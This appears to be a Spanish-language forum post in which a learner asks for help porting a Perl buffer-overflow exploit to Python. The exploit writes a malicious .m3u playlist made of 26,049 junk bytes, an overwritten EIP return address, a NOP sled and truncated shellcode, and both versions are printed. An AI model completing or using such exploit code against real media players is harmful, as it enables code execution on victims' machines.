Mensajes

Buen día,

he estado aprendiendo sobre programar/escribir exploits de una pagina muy buena a mi parecer. la cuestion es que los ejemplos estan escritos en perl y yo quisiera utilizar python para hacer los exploits.

mi problema es al tratar de traducir la funcion pack de perl a python. en perl es muy facil:

my $eip = pack('V',0x7E429353); 

lo mas parecido que encontre en python es:

from struct import pack
eip = pack('<L',0x7E429353)

incluso estuve viendo codigo de otros explots en este lenguaje y asi es como lo hacen.

la cosa es que no funciona :S,  estoy utilizando python v2.7 (intente con la 3.2 pero tampoco)

aqui dejo el codigo del explot de prueba que utilizo, en perl y python (perl si me funciona)

PERL

Código [Seleccionar] Expandir


my $file= "test1perlFinal.m3u";
my $junk= "A" x 26049;
my $eip = pack('V',0x7E429353); 

my $shellcode = "\x90" x 25;

$shellcode = $shellcode . "\xdb\xc0 ....  \x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);


Python

Código [Seleccionar] Expandir


from struct import pack

filename = "test1.m3u"
junk = "\x41" * 26049
eip = pack('<L',0x7E429353)
espdata = "\x90" * 25
payload = "\xdb\xc0\ .... \xca"
FILE = open(filename,"wb")
FILE.write(junk+eip+espdata)
FILE.close()


será que no funciona por algo del codigo? segun yo, los 2 deberian de funcionar igual

si necesitan mas informacion puedo proporcionarla, nadamas pregunten

Gracias por su ayuda